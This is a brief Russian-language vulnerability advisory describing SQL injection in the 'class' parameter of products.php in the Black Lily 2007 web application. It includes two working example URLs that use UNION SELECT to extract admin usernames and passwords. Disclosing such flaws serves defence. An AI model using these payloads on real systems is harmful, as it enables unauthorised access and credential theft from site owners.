Программа: Black Lily 2007

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «class» сценарием products.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

http://victim.com/ar/products.php?class=-1%20union%20select%201,2,password,4,username%20from%20admin/*

http://victim.com/en/products.php?class=-1%20union%20select%201,2,3,password,username%20from%20admin/*



Оставить мнение